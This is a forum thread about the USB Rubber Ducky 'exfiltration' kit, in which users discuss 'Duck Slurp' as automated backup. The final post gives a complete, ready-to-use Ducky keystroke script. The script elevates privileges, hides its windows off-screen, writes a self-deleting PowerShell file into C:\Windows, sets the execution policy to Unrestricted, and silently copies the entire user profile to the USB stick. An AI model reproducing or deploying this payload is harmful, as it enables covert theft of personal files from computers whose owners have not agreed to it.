CreekBard Posted March 2, 2014 Share Posted March 2, 2014 Hi ! Does someone know what is the interest of the exfiltrator ? Do you know a concrete use of it ? An example ? Quote Link to comment Share on other sites More sharing options...
THCMinister Posted March 3, 2014 Share Posted March 3, 2014 Define Exfiltration: an antonym for infiltration, may stand for: The same as extraction (military) (also exfil). Automated backups. You could regularly copy files to a backup location and the ducky could be used to perform the actions faster and automatic. Quote Link to comment Share on other sites More sharing options...
CreekBard Posted March 3, 2014 Author Share Posted March 3, 2014 I'm not sure to understand all of it but, do you know a possible use of it, with a script ? Isn't it possible to use automatically to save files found on a computer using the URD ? Quote Link to comment Share on other sites More sharing options...
SFisher Posted March 6, 2014 Share Posted March 6, 2014 Well there's the ducky slurp that does automatic backups. Darren Kitchen and OverWraith put this together. https://forums.hak5.org/index.php?/topic/30179-payload-duck-slurp-v2-silent/?hl=+duck%20+slurp Maybe this will inspire you. Quote Link to comment Share on other sites More sharing options...
CreekBard Posted March 7, 2014 Author Share Posted March 7, 2014 (edited) That looks interesting, thanks ! So we can conclude that the Exfiltration pack just add a USB key ? Edited March 7, 2014 by CreekBard Quote Link to comment Share on other sites More sharing options...
SFisher Posted March 8, 2014 Share Posted March 8, 2014 Pretty much. The USB makes it nice because if you happen to run out of time, the slurp just runs in the background until you return with the USB key. Darren did an episode of Hak5 on this script, I don't know the episode off the top of my head, but I'm sure it can't be too hard to find. Quote Link to comment Share on other sites More sharing options...
CreekBard Posted March 9, 2014 Author Share Posted March 9, 2014 If someone knows the episode, post it there please ! Quote Link to comment Share on other sites More sharing options...
411Hall Posted March 9, 2014 Share Posted March 9, 2014 If your interested I have a slighty different version of the Ducky Slurp. Same premise as Darrens and Overwraiths just written in PowerShell. DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\' ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name ENTER STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER STRING copy-item $userDir $usbPath.Name -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER There is also a USB Reporting method on the Duck Toolkit. 411. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.